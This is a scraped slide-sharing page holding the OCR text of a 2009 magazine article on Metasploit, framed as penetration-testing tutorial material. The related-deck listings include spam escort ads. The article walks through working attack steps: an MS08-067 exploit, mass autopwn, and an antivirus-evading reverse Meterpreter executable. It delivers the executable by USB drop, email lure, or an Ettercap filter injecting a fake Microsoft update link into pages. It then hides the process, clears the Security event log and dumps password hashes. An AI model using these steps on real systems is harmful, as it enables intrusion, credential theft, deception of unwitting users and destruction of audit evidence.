 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 

Similaire à 24 33 -_metasploit (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Metapwn
MetapwnMetapwn
Metapwn
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Exploit Frameworks
Exploit FrameworksExploit Frameworks
Exploit Frameworks
 
Metasploit
MetasploitMetasploit
Metasploit
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Meta sploit (cyber security)
Meta sploit (cyber security)  Meta sploit (cyber security)
Meta sploit (cyber security)
 
Metasploit
MetasploitMetasploit
Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Metasploit Computer security testing tool
Metasploit  Computer security testing toolMetasploit  Computer security testing tool
Metasploit Computer security testing tool
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
ARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENTARMITAGE-THE CYBER ATTACK MANAGEMENT
ARMITAGE-THE CYBER ATTACK MANAGEMENT
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 

Dernier

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 

Dernier (20)

Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 

24 33 -_metasploit

  • 1. ATTACK Metasploit STEPHEN ARGENT Alternate Uses for a Penetration Test Difficulty The Metasploit Framework is a program and subproject developed by Metasploit LLC. It was initially created in 2003 in the Perl programming language, but was later completely re-written in the Ruby Programming Language. A s of the most recent release (3.2), released Metasploit has a few distinct advantages for under the BSD licensing scheme (to penetration testers. One of them is that you can make it truly Open Source, as opposed use Metasploit to test an exploit (whether it's your to its previous Metasploit License which made it own or someone else's) on all the machines on a partially Open Source). network simultaneously, and have it automatically script kiddies or Black Hats to break into exploit and gain you an Administrative shell systems. Typically, a vulnerability researcher on each system. You can also feed it results would have to go through the cycle of Discovery from other programs (such as Nmap or Nessus – >Disclosure>Analysis>Exploit Development>Testin usage instructions for these can be found on the g>Release. vendor website, or at http://greyhat-security.com/ ) However, since the release of Metasploit, and use that to target only specific services in a exploit development is now quite a simple network wide exploit session. It also simplifies the process that even an amateur coder can job of a penetration tester in the sense that they accomplish. It also serves as a development are able to start up Metasploit, leave it running platform for payloads (the code executed after by itself in the background, and proceed to an exploit has successfully been run), payload attempt other Network Penetration Tests. A distinct encoders (to obscure data so that Intrusion advantage that is good for a quick preliminary Detection Systems [IDS] and Intrusion Protecion vulnerability assessment is Metasploit's ability to Systems [IPS] don't pick up and block the integrate with Nmap to perform an action known WHAT YOU WILL LEARN... exploit), and various other tools. The Metasploit as Autopwning (read more about it below). Project also contains a NOOP Code Database Additionally, if a compromised box has two or Basics of how to use Metasploit (set of Assembly language instructions for the more separate subnets or NIC's (Network Interface How to generate payloads into executables processor). Cards), then the Penetration Tester can add a Basic & Advanced use of the Meterpreter Module About the Article WHAT YOU SHOULD You've probably heard a lot of talk about Metasploit over the years: About how it can speed up the results of KNOW... exploitation. It is a great tool for Penetration testers. It makes their job of exploitation and post-exploitation a lot easier, and a lot faster. However, coverage on how to use Metasploit is not always readily available. There are Your way around Linux a few lesser known features of Metasploit which I would like to show you. The aim of this article is to teach you Basic knowledge of Networking what the Metasploit project is, the basics of how to use it, and an example of a lesser known feature: how to use and NAT Metasploit to tunnel from inside a corporate network when an external firewall is impenetrable, and then how to Knowledge of how exploits exploit the internal network from there. Curious? Read on. operate will be useful 24 HAKIN9 2/2009
  • 2. METASPLOIT ALTERNATE USES FOR A PENETRATION TEST tunnel through this box via Metasploit, and most damage is done, and this is where BackTrack 3 is because it has the correct is therefore able to interact with or exploit Meterpreter becomes quite handy. Ruby Libraries. The most updated Ruby the machines on the separate subnet which Meterpreter aims to avoid HIDS (Host Library (except for the CVS snapshot) isn't the Penetration Tester could not initially Intrusion Detection Systems) by injecting completely compatible with Metasploit. access. Aside from Metasploit's sheer power itself into the running process, as well as First, take your copy of BackTrack, and go and ease of use, it also allows Forensic providing the attacker with a platform on to: Avoidance tools and a number of other IDS which further scripts can be coded and K menu>Backtrack>Penetration>Fram evasion techniques to be executed. The launched. It is an injected attack platform. It ework Version 3>Framework3-MsfC (see 3.0 branch of the development also allows also supports port forwarding in a manner Figure 1). developers to code their own plug-ins, similar to SSH. The MSF Project also has This will bring up the main Metasploit allowing for an unlimited number of options support for database integration, so it can console prompt. Once this is done, you (limited only by creativity and personal ability). output and interact with various databases, have many options. The first step (after The Metasploit Framework has a such as Postgres or SQLite. scanning your target system for open number of different interfaces which a ports/services) is to show the available user can choose to interact with. The How do you exploits: command line interface is the interface work metasploit? of choice for most Linux users, due to Metasploit is simple to use – as was show exploits its simplicity and light-weight nature. It is mentioned before, it is designed with operated through a series of commands. ease-of-use in mind to aid Penetration This will bring up a list of all of them. The list It allows the user to: choose an exploit and Testers. It functions in the following way; will look similar as shown in Figure 2. a payload, show options for both of these, you gather info about the target (ports, For this example, we will choose the configure options for both of these, choose services, etc.), decide on a vulnerable recent Microsoft MS08_067 exploit. To a platform, and launch the exploit. The service, select the exploit, fill in a few select it, you type use, and the name of the Web interface is the UI of choice for most options, select a payload, fill in options exploit as displayed on the left: Windows users, as the separate command there as well, and then launch the exploit. I line isn't always guaranteed to be stable will walk you through a brief demo, just so use windows/smb/ms08_067_netapi – the web interface contains a built-in you can get familiar with the basics of the command line, as well as a graphical MSF, then you can work at your own pace. This will select that desired exploit. Now, we exploitation option. This can be started by I will be taking you through this demo in need to take a look at the options (you can going to Start Menu>Programs>Metasploit BackTrack 3 (which is what Hakin.9 Live also see the vulnerable systems available Framework>MSFWeb, and the firing up your is based on), so go ahead and download with the show targets command – this is web browser and going to http://127.0.0.1: that if you don't already have it – http: not required for this exploit however): 55555. The MSF (Metasploit Framework) //www.remote-exploit.org/backtrack_ GUI is also a popular option for Windows download.html. The reason for using show options users, as it feels more like a conventional program than a command line, and is what Listing 1. Kerio Firewall 2.1.4 Authentication Packet Overflow exploit code most Windows users are comfortable with. There is also a Metasploit daemon, which is connect print_status("Trying target #{target.name}...") a Metasploit command line tool that listens sploit = make_nops(4468) + payload.encoded for, and interacts with, remote connections. sploit << [target.ret].pack('V') + [0xe8, -850].pack('CV') The MSF focuses on simplicity for sock.put(sploit) sock.get_once(-1, 3) the Penetration Tester. For example, the handler following code is from the body of the disconnect Kerio Firewall 2.1.4 Authentication Packet Overflow exploit (see Listing 1). A powerful feature of the MSF that simplifies the post-exploitation process is the Meterpreter module, which is injected directly into a running process on the exploited system, aiding in IDS evasion, and assisting in avoidance of detection by the user. In a penetration test, a lot of focus is placed on information gathering and exploitation, not a lot of importance is given to the power of the post-exploitation phase. It is during this period that the Figure 1. Opening the Metasploit Console 2/2009 HAKIN9 25
  • 3. ATTACK Just before we go setting options, we also also a number of options for you to explore features. First, let's take a look at autopwn. need to choose a payload (see Figures 3,4). on your own; things such as encoding This feature is relatively new. It allows you payloads to avoid Anti-Virus and IDS, to automate exploitation on a large scale, show payloads constructing your own exploits, payload based on a self-executed Nmap scan. set payload windows/shell/bind_tcp generated executables, automated post- Basically, Metasploit takes the results of show options exploitation scripts, and numerous other a scan and puts them into a database tricks of the trade. Lets take a look at some (meaning that only the parameters you And finally, we are required to set the of them. specify in the Nmap scan will be added to options. In this case, only the RHOST value this database). Then Metasploit analyses is needed (the target/remote host). Then Metasploit – is it really the results. It selects appropriate exploits type exploit : useful in a penetration test? for the operating systems and services Aside from the obvious reasons for it being encountered. It automatically sets the set RHOST 192.168.1.3 useful in a penetration test (fast exploitation variables, and gives you as many shells as exploit of large scale hosts, interoperability it can possibly obtain on as many systems and integration with other software, as it can exploit. Now, some may call this Those are the basic usage steps behind customisable and user-created plugins), being a script kiddie, and in essence it is, a simple Metasploit exploitation. There are Metasploit does have a few other useful but it's more than just that. It's being smart, in the sense that if time is of the essence, you can use this to your advantage. For example, lets say there are two penetration testers going for the same job, and each is put to the test to see who can find the most vulnerabilities in a set amount of time (say 45 minutes). One decides to use autopwn, while the other starts fuzzing applications, brute forcing passwords, looking for poorly configured passwords, etc. Who do you think will come out on top? The one who used autopwn can start it running, walk away, grab a coffee, come back, and quite realistically have 50 or more shells on his PC (if the company isn't already secured). He will get the job, at which point he will be able to perform a more detailed analysis. To experiment with autopwn in BackTrack 3, go to a terminal and type: cd /pentest/fast-track && fast- Figure 2. Metasploit Payloads track.py -i Choose option 2, then option 3, then option 1. Enter a regular nmap scan on a range of IP's (excluding the nmap command, and just specifying the options), and press enter: -sS -sV -T 3 -P0 -O 192.168.1.1-254 We will now examine some other features and tricks of the MSF. Using Metasploit to aid in bypassing corporate firewalls Quite often, penetration testers will do what Figure 3. Setting Payload Options is known as a black box penetration test; 26 HAKIN9 2/2009
  • 4.
  • 5. ATTACK they know nothing about the target, and the Meterpreter process with a Windows remotely, replace all LAN addresses with they have to get into the company system. System process to avoid further detection, your WAN address, and make sure that Quite often, they can't get physical access gather more info about the company and your router and firewall a appropriately to the building due to heavy exterior the internal network, and then route through forwarding all requests to the listening security, and can't bypass the firewall the exploited box to attack the internal machine. Ideally, you'll be DMZ'ing all Port because it has been secured well. It's a server. Shall we begin? 5555 (in this case) traffic to your listening heavy-duty system. At this stage, there Just as an initial note, I advise you only host. We will be using BackTrack on Linux are numerous options: weak passwords, do this on your own LAN at home, or in a as our intrusion system, and Windows as session hijacking, etc. In some cases, specifically designed Penetration Testing our target (because most employees use none of these are an option.At this stage, Lab for your first time, until you get used Windows in the workplace). penetration testers often revert to social to it and familiar with Meterpreter and the First up, fire up BackTrack (or your engineering, which – if successful – may or Metasploit interface. If you are doing this equivalent Linux system). We will need to may not get them the required credentials. So – how can Metasploit be of assistance to us in this scenario? Proceed to find out. You may also encounter a client-side firewall (I.e., one on the targets computers), however, in a corporate environment this is not always the case. If so, you may need to Most corporate firewalls are effective because they are configured to block all incoming requests that don't fit a certain autorized criteria, and any incoming requests that originated without an initial outgoing request. The downside to these firewalls is that they are often configured to not block any outgoing requests (to enable a productive work environment), or configured to not block outgoing requests on certain ports (such as 21/FTP, 22/SSH, 80/HTTP, 8080/HTTProxy, etc.) Using Metasploit, we can take advantage of this weakness. Now, you might be wondering how we can get inside, if the only things that can get through are outgoing requests (such as the user browsing the Internet, or a remote Network Attached Storage [NAS] Figure 4. Checking Payload Options that the company interacts with). It's simple. We make the user request a connection to us. Not by asking them, but by combining Metasploit and a little social engineering, or brief physical access. This is possible because Metasploit's payloads aren't just available for use in exploitation.. They can also be compiled into binary files (in the form of either Windows .exe's, or Linux binaries). And now, thanks do the MSF 3.2 release, they can be encoded so they avoid Anti-Virus detection. We will be taking advantage of the binary generation as well as the encoder. Combining Metasploit with the power of the Meterpreter (Metasploit's powerful post-exploitation shell), and using the outgoing protocol weakness in the firewall we can get into the company. Once we are past the firewall, we will merge Figure 5. Checking the Password Dump 28 HAKIN9 2/2009
  • 6. METASPLOIT ALTERNATE USES FOR A PENETRATION TEST update Metasploit to the latest version. LPORT=5555 R | ./msfencode -b '' -t this is a reverse connection, and we need Open up the console, and type the exe -o output.exe something to accept it on our end. In the following commands: same window start up the MSF console Now, let's analyze this command. The and then set up the listener (see Listing 2). bt ~ # cd /pentest/exploits/ first part tells msfpayload to use the After this, you will need to convince framework3/ Meterpreter Reverse TCP payload, with the person to run it. We will cover that in a bt ~ # svn co http://metasploit.com/ the Local Host of 192.168.1.2, and the minute, but just for argument sake this is svn/framework3/trunk/ Local Port of 5555. This is where any what it will look like once they have run as machine that runs the executable will try to shown in Listing 3. This should have updated Metasploit connect. This is output as Raw shellcode This is what you'll see once they've run with the latest version. Now, we will need (as indicated by the 'R') and then piped the program. This will eventually be your to generate our executable to use in this through to msfencode. We specified -b little control terminal over the entire network. Pentest. We will be using the Reverse ''; no bad characters to avoid (though There are a number of ways of get someone TCP Meterpreter payload (windows/ you can include characters as well, for on the inside to run it. First you could meterepreter/reverse_tcp), which gets example: -b 'x00xff'). We specify purchase a cheap flash drive, copy the file the payload (our generated executable) the type of output as an executable, and as a hidden file onto the flash drive, and to connect to our listening host from the the output file as output.exe – simple, cause it to autorun as soon as it's inserted inside. Type this in the same console: yet effective. This executable is our little into a computer. You could then conveniently reverse connector that we will need to get drop this flash drive outside the building, or ./msfpayload windows/meterpreter/ inside of the company. Put it aside for the a specific employees locker, where curiosity reverse_tcp LHOST=192.168.1.2 moment. We need to set up a listener since will take over. Someone will plug it into the computer to test it out. It will run and you will get the command session. A second idea Listing 2. Setting up the Exploit Listener could be to attach it to an email. Use a bit of bt ~ # ./msfconsole social engineering on a targeted employee msf > use exploit/multi/handler to convince them to run the program. msf > set payload windows/meterpreter/reverse_tcp msf > set LHOST 192.168.1.2 A third option would be to use a form msf > set LPORT 5555 of MiTM (Man in the Middle) attack to msf > show options add frames into all web pages, informing msf > exploit people that they need to perform an official Listing 3. Exploit Listener Output update of their system by clicking on the link, which will download your program to msf exploit(handler) > exploit run. For this section, we will be working [*] Started reverse handler [*] Starting the payload handler... with Ettercap and some Ettercap filters [*] Transmitting intermediate stager for over-sized stage...(191 bytes) – you can read a full tutorial on how to [*] Sending stage (2650 bytes) use Ettercap for MiTM attacks in one of [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... my previous articles in Hakin9. Initially, we'll [*] Upload completed. need to start a web server on K Menu> [*] Meterpreter session 1 opened (192.168.1.2:5555 -> 192.168.1.3:1138) Services>HTTPD>Start HTTPD CGI. Now, we will need to copy the output.exe file we meterpreter > generated before to the root directory of the Listing 4. Ettercap Web Filter Code web server. Open up a terminal, and type: if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { bt ~ # cp /pentest/exploits/ replace("Accept-Encoding", "Accept-Nothing!"); framework3/output.exe /var/www/ } htdocs/output.exe } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "<title>")) { Now, we will need to make the Ettercap filter replace("</title>", "</title><form action="http://192.168.1.3/output.exe" to actually add the frame to the webpage. method="link"><img src="http://192.168.1.3/security.png"><INPUT TYPE=submit In that same terminal, type: value="Download Security Update"></form><html><body><h10> Your PC is vulnerable and needs to be updated. The Microsoft Bulletin ID is MS08_067. Please update by downloading the program and running the update. bt ~ # kedit web.filter For more information, see <a href=http://www.microsoft.com/technet/security/bulletin/ MS08-067.mspx”>here</a></h10></body></html>"); And in the page that pops up, copy and msg("html injected"); }} paste as shown in Listing 4 (changing the appropriate variables). 2/2009 HAKIN9 29
  • 7. ATTACK For the security.png file, consider using download – It's a pretty obvious one, use this to execute a program you one like http://tinyurl.com/hakin9shield – it's but it allows you to download remote uploaded, or interact with a windows large, professional, and makes sure it's files to your local PC Basic usage is Cmd shell on the local system, etc. seen. However, it may also be an idea to this: resize it so it's not too overbearing. Adjust Typical usage is: the file to suit your situation, and click Save download [options] src1 src2 src3 ... and then close Kedit . In the same terminal, destination • Usage: execute -f file [options] we will now turn that filter into a file usable OPTIONS: by Ettercap, then start up Ettercap. -r Download recursively. OPTIONS: bt ~ # etterfilter web.filter web.ef For example, we change to a directory (C: • -H – Create the process hidden from bt ~ # ettercap -T -q -F web.ef Documents and SettingsFail User) and view -M arp:remote /192.168.1.1-255/ -P then download their My Documents folder: • -a <opt> – The arguments to pass to autoadd the command • download -r My Documents /home/ • -c – Channelized I/O (required for Provided you have Metasploit's exploit root/Documents interaction) handler listening, all you have to do is wait • upload – Upload is the same basic • -d <opt> – The dummy executable to until someone falls for your trick, and you'll idea, just in reverse (upload instead of launch when using -m have a Meterpreter session. After that, if download). Usage is exactly the same • -f <opt> – The executable command you want to make it seem realistic, you can format. to run cancel Ettercap with q. If you can't get it • execute – This will be a useful • -h – Help menu working for some reason, I upload a copy command to remember. It allows you to • -i – Interact with the process after of it to my site: http://greyhat-security.com/ execute commands on the system and creating it html.ef – keep in mind, you'll need to have also to interact with them. You could • -m – Execute from memory the same variables as I did for it to work. Now, we will take a look at a few possible options once you have this command session. First up, you'll want to hide the process, so there's no obvious additional programs running. Type ps to see a list Figure 6. Deleting Evidence of processes. You should see something similar to the following (see Listing 5). As you can see, our software (output.exe) is still running. We will use the migrate command to merge out process with svchost.exe, which runs a PID of 716. Type the following command: meterpreter > migrate 716 You should see something like this: [*] Migrating to 716... [*] Migration completed successfully. Type ps to confirm: meterpreter > ps Process list (see Listing 6) As you can see, our process has all but disappeared. Now that we are a little less obviously in their system, we have more time to complete our operations. Basic operation commands can be seen by typing help. Some important ones that you may use: Figure 7. Routing a scan through the client 30 HAKIN9 2/2009
  • 8. METASPLOIT ALTERNATE USES FOR A PENETRATION TEST • -t – Execute process with currently Listing 5. Process List Before Migration impersonated thread token 240 output.exe C:Documents and SettingsFail UserMy Documentsoutput.exe 404 smss.exe SystemRootSystem32smss.exe For example, to execute a command 484 winlogon.exe ??C:WINDOWSsystem32winlogon.exe prompt hidden from their view, and interact 528 services.exe C:WINDOWSsystem32services.exe with it, type: 540 lsass.exe C:WINDOWSsystem32lsass.exe 716 svchost.exe C:WINDOWSsystem32svchost.exe 768 svchost.exe C:WINDOWSSystem32svchost.exe execute -f cmd.exe -c -H -i 1156 Explorer.EXE C:WINDOWSExplorer.EXE 1184 spoolsv.exe C:WINDOWSsystem32spoolsv.exe 1316 RUNDLL32.EXE C:WINDOWSSystem32RUNDLL32.EXE • run – This can be used to run ruby 1324 ctfmon.exe C:WINDOWSSystem32ctfmon.exe scripts, such as the following from 1332 msmsgs.exe C:Program FilesMessengermsmsgs.exe Chris Gates: 1584 nvsvc32.exe C:WINDOWSSystem32nvsvc32.exe 1928 WinVNC.exe C:Program FilesTightVNCWinVNC.exe print_line("Clearing the Security Event Listing 6. Process List After Migration Log, it will leave a 517 eventn") log = client.sys.eventlog.open('secur ============ ity') PID Name Path • hashdump – This can only be used if --- ---- ---- you type use priv beforehand. When 404 smss.exe SystemRootSystem32smss.exe you do, and then you type hashdump, 460 csrss.exe ??C:WINDOWSsystem32csrss.exe you will get a dump of all the local user 484 winlogon.exe ??C:WINDOWSsystem32winlogon.exe account passwords, which you can 528 services.exe C:WINDOWSsystem32services.exe then crack with Ophcrack or a similar 540 lsass.exe C:WINDOWSsystem32lsass.exe 716 svchost.exe C:WINDOWSsystem32svchost.exe program. 768 svchost.exe C:WINDOWSSystem32svchost.exe 908 svchost.exe C:WINDOWSSystem32svchost.exe Another idea could be to generate a 936 svchost.exe C:WINDOWSSystem32svchost.exe 1156 Explorer.EXE C:WINDOWSExplorer.EXE reverse-vnc executable in the same way we 1184 spoolsv.exe C:WINDOWSsystem32spoolsv.exe did with Meterpreter. Set up another listener, 1316 RUNDLL32.EXE C:WINDOWSSystem32RUNDLL32.EXE upload the generated payload, and get it 1324 ctfmon.exe C:WINDOWSSystem32ctfmon.exe to execute remotely using the Meterpreter 1332 msmsgs.exe C:Program FilesMessengermsmsgs.exe 1584 nvsvc32.exe C:WINDOWSSystem32nvsvc32.exe session. This will give us a VNC on the 1928 WinVNC.exe C:Program FilesTightVNCWinVNC.exe remote PC. Another handy trick is to use the Listing 7. Checking the Route Table exploited PC to pivot through, in order meterpreter > route to exploit other PC's inside the network Subnet Netmask Gateway that are not accessible externally (such ------ ------- ------- as the internal server). To do this in your 0.0.0.0 0.0.0.0 192.168.1.1 127.0.0.0 255.0.0.0 127.0.0.1 current session, you'll need to do a few 192.168.1.0 255.255.255.0 192.168.1.3 things. First off, you'll need to type route 192.168.1.3 255.255.255.255 127.0.0.1 to see the current network configuration. 192.168.1.255 255.255.255.255 192.168.1.3 224.0.0.0 240.0.0.0 192.168.1.3 You should get an output like as shown in 255.255.255.255 255.255.255.255 192.168.1.3 Listing 7. Then we'll need to take note of the local Listing 8. Adding a New Route subnet 192.168.1.0, and then background meterpreter > ^Z the meterpreter session by pressing Background session 1? [y/N] y [Ctrl]+[Z] and then typing y : msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1 msf exploit(handler) > route print meterpreter > ^Z Background session 1? [y/N] y Active Routing Table ==================== This will enable us to add a local route for Subnet Netmask Gateway metasploit. We will now use the route add ------ ------- ------- command, in the format: 